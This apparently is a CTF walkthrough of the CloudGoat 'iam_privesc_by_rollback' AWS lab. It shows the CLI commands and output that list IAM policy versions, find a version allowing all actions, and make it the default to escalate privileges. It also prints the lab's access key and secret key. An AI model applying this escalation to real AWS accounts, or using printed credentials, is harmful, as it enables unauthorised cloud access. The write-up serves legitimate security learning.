iam_privesc_by_rollback
# Deploy
% ./cloudgoat.py create scenarios/iam_privesc_by_rollback
% cat /home/hnl/Desktop/ctf/cloud-goat/cloudgoat/iam_privesc_by_rollback_cgidki2woqscyc/start.txt
cloudgoat_output_aws_account_id = 287336331436
cloudgoat_output_policy_arn = arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc
cloudgoat_output_raynor_access_key_id = AKIAUFZUUPCWP5AI5R54
cloudgoat_output_raynor_secret_key = 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
cloudgoat_output_username = raynor-iam_privesc_by_rollback_cgidki2woqscyc
# Start
% aws iam get-user --profile raynor
{
"User": {
"Path": "/",
"UserName": "raynor-iam_privesc_by_rollback_cgidki2woqscyc",
"UserId": "AIDAUFZUUPCWOWCUNV2FJ",
"Arn": "arn:aws:iam::287336331436:user/raynor-iam_privesc_by_rollback_cgidki2woqscyc",
"CreateDate": "2021-09-10T05:44:36Z",
"Tags": [
{
"Key": "Name",
"Value": "cg-raynor-iam_privesc_by_rollback_cgidki2woqscyc"
},
{
"Key": "Scenario",
"Value": "iam-privesc-by-rollback"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
]
}
}
% aws iam list-attached-user-policies --user-name raynor-iam_privesc_by_rollback_cgidki2woqscyc --profile raynor
{
"AttachedPolicies": [
{
"PolicyName": "cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc",
"PolicyArn": "arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc"
}
]
}
% aws iam list-policy-versions --policy-arn arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc --profile raynor
{
"Versions": [
{
"VersionId": "v5",
"IsDefaultVersion": false,
"CreateDate": "2021-09-10T05:44:41Z"
},
{
"VersionId": "v4",
"IsDefaultVersion": false,
"CreateDate": "2021-09-10T05:44:41Z"
},
{
"VersionId": "v3",
"IsDefaultVersion": false,
"CreateDate": "2021-09-10T05:44:41Z"
},
{
"VersionId": "v2",
"IsDefaultVersion": false,
"CreateDate": "2021-09-10T05:44:41Z"
},
{
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2021-09-10T05:44:36Z"
}
]
}
% aws iam get-policy-version --policy-arn arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc --version-id v1 --profile raynor
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "IAMPrivilegeEscalationByRollback",
"Action": [
"iam:Get*",
"iam:List*",
"iam:SetDefaultPolicyVersion"
],
"Effect": "Allow",
"Resource": "*"
}
]
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2021-09-10T05:44:36Z"
}
}
% aws iam get-policy-version --policy-arn arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc --version-id v2 --profile raynor
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Action": "*",
"Effect": "Allow",
"Resource": "*"
}
]
},
"VersionId": "v2",
"IsDefaultVersion": false,
"CreateDate": "2021-09-10T05:44:41Z"
}
}
# Change to ver 2
% aws iam set-default-policy-version --policy-arn arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc --version-id v2 --profile raynor
# View again and create s3 bucket with super special priv
% aws iam get-policy --policy-arn arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc --profile raynor
% aws s3api create-bucket --bucket myspecialpriv --region us-east-1 --profile raynorLast updated
Was this helpful?